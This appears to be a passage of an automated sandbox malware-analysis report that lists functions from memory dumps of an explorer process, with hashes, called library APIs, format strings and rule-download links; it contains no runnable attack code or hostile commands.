                                                                                                                                                                                                                                  • Opcode ID: 14c4a97c4b08b3270cb656e964ed4b1d5c2adef1121c7531c59df40ed71bccd9
                                                                                                                                                                                                                                  • Instruction ID: 3bf3696af2c24d60d3ea6cb0aaa7c3246f4f938ce120a69e6bcd07b76a479fc5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14c4a97c4b08b3270cb656e964ed4b1d5c2adef1121c7531c59df40ed71bccd9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C01623570178282EF189B66F964759A3A1BB4DFC5F0898359E0A17B14DE3CC4958704
                                                                                                                                                                                                                                  Function 0DF356F0 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3932841890-0
                                                                                                                                                                                                                                  • Opcode ID: 68baedd74d61a6586616d50a2cf080a5e535d65554f7165dc633709d1efe8ec6
                                                                                                                                                                                                                                  • Instruction ID: f9d3cf548ff0972a5d524d493139ae0ed92f7d5f67ce822aab5fffea01b8ed83
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68baedd74d61a6586616d50a2cf080a5e535d65554f7165dc633709d1efe8ec6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83016D2570074282EF189BAAB96873AA361AF89FC4F08D1369E0F47B58DE3CC4858700
                                                                                                                                                                                                                                  Function 102056F0 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3932841890-0
                                                                                                                                                                                                                                  • Opcode ID: 14c4a97c4b08b3270cb656e964ed4b1d5c2adef1121c7531c59df40ed71bccd9
                                                                                                                                                                                                                                  • Instruction ID: b2ebbbe4749d106e64c09664366e125e29b3abb23d864483d6d68f0a806abfd3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14c4a97c4b08b3270cb656e964ed4b1d5c2adef1121c7531c59df40ed71bccd9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B016D3571074582EF48DF66B96875AA7A2FB9DFC8F089035ED4A0BB28DE7CC0958700
                                                                                                                                                                                                                                  Function 0E0DEDF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                                  • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                                  • Opcode ID: 0c43ced84186744da42210a777eeb42f7e7b29c1cd9660ee2fd5b88daed0ec37
                                                                                                                                                                                                                                  • Instruction ID: 24e2c61bc5c20568bedc70e1a77463d29da44fb8dcf728f93249331d66ccc19e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c43ced84186744da42210a777eeb42f7e7b29c1cd9660ee2fd5b88daed0ec37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB311A36618781DAD720CFA5E89079AB7B4F789344F54142AEB8D87B28EB7DC549CF00
                                                                                                                                                                                                                                  Function 101FEDF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                                  • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                                  • Opcode ID: 0c43ced84186744da42210a777eeb42f7e7b29c1cd9660ee2fd5b88daed0ec37
                                                                                                                                                                                                                                  • Instruction ID: 0dac3a3d1e09a2dda6ffcaffe41bad3ccdd2eb0b9ddabf17343d34089648bc09
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c43ced84186744da42210a777eeb42f7e7b29c1cd9660ee2fd5b88daed0ec37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF310836218684D6D710CFA5F89479AB7B0FB99744F54142AEB8D83A28EB7DC549CF00
                                                                                                                                                                                                                                  Function 0E0DECD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                                  • API String ID: 3001812590-790759568
                                                                                                                                                                                                                                  • Opcode ID: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                                  • Instruction ID: a9bb189bf652aeec0673ed9c14ac34867b3e2c73072d54427ca36bd72193004b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD3107322187C19AD710CFA5E89038ABBA1F7D9344F94442AEBC983B29DB7DC559CB00
                                                                                                                                                                                                                                  Function 101FECD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                                  • API String ID: 3001812590-790759568
                                                                                                                                                                                                                                  • Opcode ID: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                                  • Instruction ID: d138374ebc24436965cd91f3f40fc9607748690fbb35272e5112ebfa61984b02
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1313A36218784D6C710CFA5E85434BBBA1FBE9344F58002AEBC983A19DB7CC559CF40
                                                                                                                                                                                                                                  Function 0E0DCC80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0E0DCC99
                                                                                                                                                                                                                                    • Part of subcall function 0E0DE4F0: std::_Lockit::_Lockit.LIBCPMT ref: 0E0DE506
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0E0DCCFE
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0E0DCD2C
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0E0DCD3D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 784803821-3145022300
                                                                                                                                                                                                                                  • Opcode ID: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                                  • Instruction ID: b51778ea913a8d07ca10b390e441fcd0c24c292fc540cd631660b91adc5e48f6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F116031709B8591EE10DB16E4903DAE3A1FB84BE4F884621DB9D57BA8DF7CC949C740
                                                                                                                                                                                                                                  Function 0E0DCD50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0E0DCD69
                                                                                                                                                                                                                                    • Part of subcall function 0E0DE4F0: std::_Lockit::_Lockit.LIBCPMT ref: 0E0DE506
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0E0DCDCE
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0E0DCDFC
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0E0DCE0D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 784803821-3145022300
                                                                                                                                                                                                                                  • Opcode ID: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                                  • Instruction ID: 1c59e3e2cfac274632ba143b8606ae29a65368ee8b92ba41c2745787b8dbd0f1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41118671309B8591DE00DB15E4903DAE7A1F7C4BE0F484621DA9D57B98DF7CC945C740
                                                                                                                                                                                                                                  Function 0DF2CD50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0DF2CD69
                                                                                                                                                                                                                                    • Part of subcall function 0DF2E4F0: std::_Lockit::_Lockit.LIBCPMT ref: 0DF2E506
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0DF2CDCE
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0DF2CDFC
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0DF2CE0D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 784803821-3145022300
                                                                                                                                                                                                                                  • Opcode ID: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                                  • Instruction ID: 3df7469b786cb815ba05c4d1a796790697f3254238055907ec00da1886e71f63
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5113371608B9181DE00DB5AE85037EB761F784BE4F89C2229BAD47BA8DF78D545C740
                                                                                                                                                                                                                                  Function 0DF2CC80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0DF2CC99
                                                                                                                                                                                                                                    • Part of subcall function 0DF2E4F0: std::_Lockit::_Lockit.LIBCPMT ref: 0DF2E506
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0DF2CCFE
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0DF2CD2C
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0DF2CD3D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 784803821-3145022300
                                                                                                                                                                                                                                  • Opcode ID: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                                  • Instruction ID: 68bb6938ae4ea68d2ed735188de68e48ddc0735f26811f0ec009e86274b26eb9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65116031608B9581DE00DB5AF84037AB761F784BE4F89C2229BAE47BA8EF7CD545C740
                                                                                                                                                                                                                                  Function 101FCC80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 101FCC99
                                                                                                                                                                                                                                    • Part of subcall function 101FE4F0: std::_Lockit::_Lockit.LIBCPMT ref: 101FE506
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 101FCCFE
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 101FCD2C
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 101FCD3D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 784803821-3145022300
                                                                                                                                                                                                                                  • Opcode ID: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                                  • Instruction ID: 3aa0ab0c8be6e767e8434665557fd09326b25ea0a101848f9791afe46b5eaa0e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f98635049141d81e06d3963a9a862af366ad6ef44c02a07aa6b920e6d5b1ac46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6111B235304B8881DF00DB11E54039AA361FBC8BE4F944221EA9D4BBA8DFBCD595CB40
                                                                                                                                                                                                                                  Function 101FCD50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 101FCD69
                                                                                                                                                                                                                                    • Part of subcall function 101FE4F0: std::_Lockit::_Lockit.LIBCPMT ref: 101FE506
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 101FCDCE
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 101FCDFC
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 101FCE0D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 784803821-3145022300
                                                                                                                                                                                                                                  • Opcode ID: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                                  • Instruction ID: f97ebd3ede3673b26c6ab712930166446d94a2452e0f36de02cbd804729c9654
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb7103a2e2ab45e08b878171c973a027648962e45892d7c3ee37ec943f10c22c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31119075304B8881CE00DB51E55039EA361F7C8BE0F544221EA9D4BBA8DF7CD455CB40
                                                                                                                                                                                                                                  Function 0E0DD790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0E0DD7A2
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0E0DD7E8
                                                                                                                                                                                                                                    • Part of subcall function 0E0FCE10: setlocale.LIBCMT ref: 0E0FCE24
                                                                                                                                                                                                                                    • Part of subcall function 0E0FCE10: _Yarn.LIBCPMT ref: 0E0FCE3E
                                                                                                                                                                                                                                    • Part of subcall function 0E0FCE10: setlocale.LIBCMT ref: 0E0FCE4D
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0E0DD807
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0E0DD818
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 409252694-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                                  • Instruction ID: 247ee0a1c3eb82c5cf2a1573be7b8641a3a07563dcc9853cbed27297b0336f32
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F03672354A8590DB14FF35E9901ED9365EBD4BC4F884A218B4D4B968EF38CD9DC740
                                                                                                                                                                                                                                  Function 0DF2D790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0DF2D7A2
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0DF2D7E8
                                                                                                                                                                                                                                    • Part of subcall function 0DF4CE10: setlocale.LIBCMT ref: 0DF4CE24
                                                                                                                                                                                                                                    • Part of subcall function 0DF4CE10: _Yarn.LIBCPMT ref: 0DF4CE3E
                                                                                                                                                                                                                                    • Part of subcall function 0DF4CE10: setlocale.LIBCMT ref: 0DF4CE4D
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0DF2D807
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0DF2D818
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 409252694-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                                  • Instruction ID: 75a09e82c12e07c5d7de48f068353e0ecfed97ab25c1afa37891478e20ff0347
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a105885c8180c4e6dacf1720721d54cfb435c94c5031aeba66c4ec3d3046334
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82F0626231899551CB14EB29EC501BD7325EB94B84F95C0218B4E8B568EF38CEC9C390
                                                                                                                                                                                                                                  Function 101FD790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 101FD7A2
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 101FD7E8
                                                                                                                                                                                                                                    • Part of subcall function 1021CE10: setlocale.LIBCMT ref: 1021CE24
                                                                                                                                                                                                                                    • Part of subcall function 1021CE10: _Yarn.LIBCPMT ref: 1021CE3E
                                                                                                                                                                                                                                    • Part of subcall function 1021CE10: setlocale.LIBCMT ref: 1021CE4D
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 101FD807
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 101FD818
                                                                                                                                                                                                                                  Strings
